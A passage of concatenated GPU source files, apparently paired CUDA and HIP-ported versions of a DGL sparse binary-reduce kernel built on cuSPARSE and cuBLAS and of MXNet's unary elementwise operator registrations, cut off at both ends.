CUSPARSE_CALL(hipsparseSetStream(thr_entry->cusparse_handle, rtcfg.stream)); // allocate matrix for temporary transposed output DType* trans_out = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, m * n * sizeof(DType))); // all one data array DType* valptr = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, nnz * sizeof(DType))); utils::Fill<kDLGPU>(rtcfg.ctx, valptr, nnz, static_cast<DType>(1.)); hipsparseMatDescr_t descr; CUSPARSE_CALL(hipsparseCreateMatDescr(&descr)); CUSPARSE_CALL(hipsparseSetMatType(descr, HIPSPARSE_MATRIX_TYPE_GENERAL)); CUSPARSE_CALL(hipsparseSetMatIndexBase(descr, HIPSPARSE_INDEX_BASE_ZERO)); CUSPARSE_CALL(Xcsrmm2<DType>( thr_entry->cusparse_handle, HIPSPARSE_OPERATION_NON_TRANSPOSE, HIPSPARSE_OPERATION_TRANSPOSE, m, n, k, nnz, &alpha, descr, valptr, csr.row_offsets.data, csr.column_indices.data, B_data, n, &beta, trans_out, m)); device->FreeWorkspace(rtcfg.ctx, valptr); // transpose the output matrix if (!thr_entry->cublas_handle) { CUBLAS_CALL(hipblasCreate(&(thr_entry->cublas_handle))); } CUBLAS_CALL(hipblasSetStream(thr_entry->cublas_handle, rtcfg.stream)); CUBLAS_CALL(Xgeam<DType>( thr_entry->cublas_handle, HIPBLAS_OP_T, HIPBLAS_OP_N, n, m, &alpha, trans_out, m, &beta, nullptr, n, C_data, n)); device->FreeWorkspace(rtcfg.ctx, trans_out); } // forward template <typename DType> void FallbackCallBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; typedef cuda::FunctorsTempl<Idx, DType, LeftSelector, RightSelector, BinaryOp, Reducer> Functors; typedef cuda::BinaryReduce<Idx, DType, Functors> UDF; // csr auto outcsr = graph.GetOutCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(outcsr.indptr, outcsr.indices); // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(outcsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, GData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } template <typename DType> void FallbackCallBackwardBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; constexpr int Mode = binary_op::kGradLhs; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; // For backward computation, we use reverse csr and switch dst and src. // This benefits the most common src_op_edge or copy_src case, because the // gradients of src are now aggregated into destination buffer to reduce // competition of atomic add. auto incsr = graph.GetInCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(incsr.indptr, incsr.indices); typedef cuda::BackwardFunctorsTempl<Idx, DType, typename SwitchSrcDst<LeftSelector>::Type, typename SwitchSrcDst<RightSelector>::Type, BinaryOp, Reducer> Functors; typedef cuda::BackwardBinaryReduce<Mode, Idx, DType, Functors> UDF; // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(incsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(incsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(incsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, BackwardGData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } } // namespace cuda template <> void CallBinaryReduce<kDLGPU, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<float>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, gdata->out_data, gdata->out_size, gdata->x_length); } } template <> void CallBinaryReduce<kDLGPU, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<double>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, gdata->out_data, gdata->out_size, gdata->x_length); } } // backward template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<float>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<double>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } // generate definitions #define REDUCER ReduceSum #define XPU kDLGPU #define IDX int32_t EVAL(GEN_DTYPE, GEN_OP_TARGET, GEN_DEFINE); EVAL(GEN_BACKWARD_MODE, GEN_DTYPE, GEN_OP_TARGET, GEN_BACKWARD_DEFINE); } // namespace kernel } // namespace dgl
4506e4f74fa4cb5cf8fe511f46ecbeca71df0411.cu
/*! * Copyright (c) 2019 by Contributors * \file kernel/cuda/binary_reduce_sum.cu * \brief CUDA kernels for binary reduce sum */ #include <dgl/runtime/device_api.h> #include "../../runtime/cuda/cuda_common.h" #include "./binary_reduce_impl.cuh" #include "./backward_binary_reduce_impl.cuh" #include "../utils.h" #include "../csr_interface.h" using minigun::advance::RuntimeConfig; using Csr = minigun::Csr<int32_t>; namespace dgl { namespace kernel { namespace cuda { // specialization for cusparse template <typename DType> cusparseStatus_t Xcsrmm2(cusparseHandle_t handle, cusparseOperation_t transA, cusparseOperation_t transB, int m, int n, int k, int nnz, const DType* alpha, const cusparseMatDescr_t descrA, const DType* csrValA, const int* csrRowPtrA, const int* csrColIndA, const DType* B, int ldb, const DType* beta, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return CUSPARSE_STATUS_EXECUTION_FAILED; } template <> cusparseStatus_t Xcsrmm2<float>(cusparseHandle_t handle, cusparseOperation_t transA, cusparseOperation_t transB, int m, int n, int k, int nnz, const float* alpha, const cusparseMatDescr_t descrA, const float* csrValA, const int* csrRowPtrA, const int* csrColIndA, const float* B, int ldb, const float* beta, float* C, int ldc) { return cusparseScsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <> cusparseStatus_t Xcsrmm2<double>(cusparseHandle_t handle, cusparseOperation_t transA, cusparseOperation_t transB, int m, int n, int k, int nnz, const double* alpha, const cusparseMatDescr_t descrA, const double* csrValA, const int* csrRowPtrA, const int* csrColIndA, const double* B, int ldb, const double* beta, double* C, int ldc) { return cusparseDcsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <typename DType> cublasStatus_t Xgeam(cublasHandle_t handle, cublasOperation_t transa, cublasOperation_t transb, int m, int n, const DType* alpha, const DType* A, int lda, const DType* beta, const DType* B, int ldb, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return CUBLAS_STATUS_EXECUTION_FAILED; } template <> cublasStatus_t Xgeam<float>(cublasHandle_t handle, cublasOperation_t transa, cublasOperation_t transb, int m, int n, const float* alpha, const float* A, int lda, const float* beta, const float* B, int ldb, float* C, int ldc) { return cublasSgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <> cublasStatus_t Xgeam<double>(cublasHandle_t handle, cublasOperation_t transa, cublasOperation_t transb, int m, int n, const double* alpha, const double* A, int lda, const double* beta, const double* B, int ldb, double* C, int ldc) { return cublasDgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <typename DType> void CusparseCsrmm2( const RuntimeConfig& rtcfg, const Csr& csr, const DType* B_data, DType* C_data, int out_size, int x_length) { // We use csrmm2 to perform following operation: // C = A x B, where A is a sparse matrix in csr format, B is the dense matrix for node // feature tensor. However, since cusparse only supports column-major, while our tensor // is stored in row-major, the actual computation is: // C = trans(A x trans(B)). // Currently, we use cublasXgeam to implement transposition and allocate intermediate // workspace memory for this. // TODO(minjie): The given CSR could potentially represent a bipartite graph (e.g. in the // case of nodeflow). Currently, we don't have bipartite graph support. Here is a small // hack. In the python side, we create a CSR that includes both the source and destination // nodes in the bipartite graph (so it is still square matrix). Here, when multiplying // this sparse matrix, we specify the number of rows (the `m` here) to be equal to the // number of rows of the output tensor (i.e, the `out_size`). // In the future, we should make sure the number of rows of the given csr is equal // to out_size (a.k.a the given csr is a rectangle matrix). const int m = out_size; const int k = csr.row_offsets.length - 1; const int n = x_length; const int nnz = csr.column_indices.length; const DType alpha = 1.0; const DType beta = 0.0; // device auto device = runtime::DeviceAPI::Get(rtcfg.ctx); auto* thr_entry = runtime::CUDAThreadEntry::ThreadLocal(); // allocate cusparse handle if needed if (!thr_entry->cusparse_handle) { CUSPARSE_CALL(cusparseCreate(&(thr_entry->cusparse_handle))); } CUSPARSE_CALL(cusparseSetStream(thr_entry->cusparse_handle, rtcfg.stream)); // allocate matrix for temporary transposed output DType* trans_out = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, m * n * sizeof(DType))); // all one data array DType* valptr = static_cast<DType*>(device->AllocWorkspace(rtcfg.ctx, nnz * sizeof(DType))); utils::Fill<kDLGPU>(rtcfg.ctx, valptr, nnz, static_cast<DType>(1.)); cusparseMatDescr_t descr; CUSPARSE_CALL(cusparseCreateMatDescr(&descr)); CUSPARSE_CALL(cusparseSetMatType(descr, CUSPARSE_MATRIX_TYPE_GENERAL)); CUSPARSE_CALL(cusparseSetMatIndexBase(descr, CUSPARSE_INDEX_BASE_ZERO)); CUSPARSE_CALL(Xcsrmm2<DType>( thr_entry->cusparse_handle, CUSPARSE_OPERATION_NON_TRANSPOSE, CUSPARSE_OPERATION_TRANSPOSE, m, n, k, nnz, &alpha, descr, valptr, csr.row_offsets.data, csr.column_indices.data, B_data, n, &beta, trans_out, m)); device->FreeWorkspace(rtcfg.ctx, valptr); // transpose the output matrix if (!thr_entry->cublas_handle) { CUBLAS_CALL(cublasCreate(&(thr_entry->cublas_handle))); } CUBLAS_CALL(cublasSetStream(thr_entry->cublas_handle, rtcfg.stream)); CUBLAS_CALL(Xgeam<DType>( thr_entry->cublas_handle, CUBLAS_OP_T, CUBLAS_OP_N, n, m, &alpha, trans_out, m, &beta, nullptr, n, C_data, n)); device->FreeWorkspace(rtcfg.ctx, trans_out); } // forward template <typename DType> void FallbackCallBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; typedef cuda::FunctorsTempl<Idx, DType, LeftSelector, RightSelector, BinaryOp, Reducer> Functors; typedef cuda::BinaryReduce<Idx, DType, Functors> UDF; // csr auto outcsr = graph.GetOutCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(outcsr.indptr, outcsr.indices); // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(outcsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(outcsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, GData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } template <typename DType> void FallbackCallBackwardBinaryReduce( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, DType>* gdata) { constexpr int XPU = kDLGPU; constexpr int Mode = binary_op::kGradLhs; typedef int32_t Idx; typedef SelectSrc LeftSelector; typedef SelectNone RightSelector; typedef BinaryUseLhs<DType> BinaryOp; typedef ReduceSum<kDLGPU, DType> Reducer; // For backward computation, we use reverse csr and switch dst and src. // This benefits the most common src_op_edge or copy_src case, because the // gradients of src are now aggregated into destination buffer to reduce // competition of atomic add. auto incsr = graph.GetInCSRMatrix(); minigun::Csr<Idx> csr = utils::CreateCsr<Idx>(incsr.indptr, incsr.indices); typedef cuda::BackwardFunctorsTempl<Idx, DType, typename SwitchSrcDst<LeftSelector>::Type, typename SwitchSrcDst<RightSelector>::Type, BinaryOp, Reducer> Functors; typedef cuda::BackwardBinaryReduce<Mode, Idx, DType, Functors> UDF; // If the user-given mapping is none and the target is edge data, we need to // replace the mapping by the edge ids in the csr graph so that the edge // data is correctly read/written. if (LeftSelector::target == binary_op::kEdge && gdata->lhs_mapping == nullptr) { gdata->lhs_mapping = static_cast<Idx*>(incsr.data->data); } if (RightSelector::target == binary_op::kEdge && gdata->rhs_mapping == nullptr) { gdata->rhs_mapping = static_cast<Idx*>(incsr.data->data); } if (OutSelector<Reducer>::Type::target == binary_op::kEdge && gdata->out_mapping == nullptr) { gdata->out_mapping = static_cast<Idx*>(incsr.data->data); } // TODO(minjie): allocator minigun::advance::Advance<XPU, Idx, cuda::AdvanceConfig, BackwardGData<Idx, DType>, UDF>( rtcfg, csr, gdata, minigun::IntArray1D<Idx>()); } } // namespace cuda template <> void CallBinaryReduce<kDLGPU, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<float>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, gdata->out_data, gdata->out_size, gdata->x_length); } } template <> void CallBinaryReduce<kDLGPU, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, GData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBinaryReduce<double>(rtcfg, graph, gdata); } else { // cusparse use rev csr for csrmm auto incsr = graph.GetInCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(incsr.indptr, incsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->lhs_data, gdata->out_data, gdata->out_size, gdata->x_length); } } // backward template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, float, SelectSrc, SelectNone, BinaryUseLhs<float>, ReduceSum<kDLGPU, float>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, float>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<float>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } template <> void CallBackwardBinaryReduce<kDLGPU, binary_op::kGradLhs, int32_t, double, SelectSrc, SelectNone, BinaryUseLhs<double>, ReduceSum<kDLGPU, double>>( const RuntimeConfig& rtcfg, const CSRWrapper& graph, BackwardGData<int32_t, double>* gdata) { if (gdata->lhs_mapping || gdata->rhs_mapping || gdata->out_mapping) { cuda::FallbackCallBackwardBinaryReduce<double>(rtcfg, graph, gdata); } else { auto outcsr = graph.GetOutCSRMatrix(); Csr csr = utils::CreateCsr<int32_t>(outcsr.indptr, outcsr.indices); cuda::CusparseCsrmm2(rtcfg, csr, gdata->grad_out_data, gdata->grad_lhs_data, gdata->out_size, gdata->x_length); } } // generate definitions #define REDUCER ReduceSum #define XPU kDLGPU #define IDX int32_t EVAL(GEN_DTYPE, GEN_OP_TARGET, GEN_DEFINE); EVAL(GEN_BACKWARD_MODE, GEN_DTYPE, GEN_OP_TARGET, GEN_BACKWARD_DEFINE); } // namespace kernel } // namespace dgl
2bdb8a7fd7dcffb573e171665410004040e3b3b9.hip
// !!! This is a file automatically generated by hipify!!! /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /*! * \file elemwise_unary_op_basic.cu * \brief GPU Implementation of unary functions. */ #include "./elemwise_binary_op.h" namespace mxnet { namespace op { NNVM_REGISTER_OP(relu) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::relu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::relu>); NNVM_REGISTER_OP(_backward_relu) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::relu_grad>>); NNVM_REGISTER_OP(sigmoid) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sigmoid>); NNVM_REGISTER_OP(_backward_sigmoid) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sigmoid_grad>>); NNVM_REGISTER_OP(hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidForward<gpu>); NNVM_REGISTER_OP(_backward_hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidBackward<gpu>); // softsign NNVM_REGISTER_OP(softsign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::softsign>); NNVM_REGISTER_OP(_backward_softsign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::softsign_grad>>); // erf NNVM_REGISTER_OP(erf) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erf>); NNVM_REGISTER_OP(_backward_erf) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erf_grad>>); // erfinv NNVM_REGISTER_OP(erfinv) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erfinv>); NNVM_REGISTER_OP(_backward_erfinv) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erfinv_grad>>); // copy NNVM_REGISTER_OP(_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_reshape) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(BlockGrad) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(make_loss) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); // identity output as first input, but attributes are constrainted to be like rhs NNVM_REGISTER_OP(_identity_with_attr_like_rhs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeFirstItemEx<gpu>); NNVM_REGISTER_OP(reshape_like) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); void ShapeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); hipMemcpyAsync(out_data.dptr_, in_data.shape_.data(), in_data.ndim() * sizeof(int64_t), hipMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(shape_array) .set_attr<FCompute>("FCompute<gpu>", ShapeComputeGPU); void SizeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; using namespace mxnet_op; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); const index_t size_var = in_data.Size(); hipMemcpyAsync(out_data.dptr_, &size_var, 1U * sizeof(int64_t), hipMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(size_array) .set_attr<FCompute>("FCompute<gpu>", SizeComputeGPU); NNVM_REGISTER_OP(Cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); NNVM_REGISTER_OP(_backward_cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); // negative NNVM_REGISTER_OP(negative) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::negation>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::negation>); // abs NNVM_REGISTER_OP(abs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::abs>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::abs>); NNVM_REGISTER_OP(_backward_abs) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::sign> >); // sign NNVM_REGISTER_OP(sign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sign>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::sign>); NNVM_REGISTER_OP(_backward_sign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sign_grad> >); // round NNVM_REGISTER_OP(round) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::round>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::round>); // ceil NNVM_REGISTER_OP(ceil) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::ceil>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::ceil>); // floor NNVM_REGISTER_OP(floor) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::floor>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::floor>); // trunc NNVM_REGISTER_OP(trunc) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::trunc>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::trunc>); // rint NNVM_REGISTER_OP(rint) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::rint>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::rint>); // fix NNVM_REGISTER_OP(fix) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::fix>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::fix>); // gamma NNVM_REGISTER_OP(gamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gamma>); NNVM_REGISTER_OP(_backward_gamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gamma_grad> >); // gammaln NNVM_REGISTER_OP(gammaln) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gammaln>); NNVM_REGISTER_OP(_backward_gammaln) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gammaln_grad> >); // digamma NNVM_REGISTER_OP(digamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::digamma>); NNVM_REGISTER_OP(_backward_digamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::trigamma> >); // logical not NNVM_REGISTER_OP(logical_not) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::nt>); } // namespace op } // namespace mxnet
2bdb8a7fd7dcffb573e171665410004040e3b3b9.cu
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /*! * \file elemwise_unary_op_basic.cu * \brief GPU Implementation of unary functions. */ #include "./elemwise_binary_op.h" namespace mxnet { namespace op { NNVM_REGISTER_OP(relu) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::relu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::relu>); NNVM_REGISTER_OP(_backward_relu) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::relu_grad>>); NNVM_REGISTER_OP(sigmoid) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sigmoid>); NNVM_REGISTER_OP(_backward_sigmoid) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, 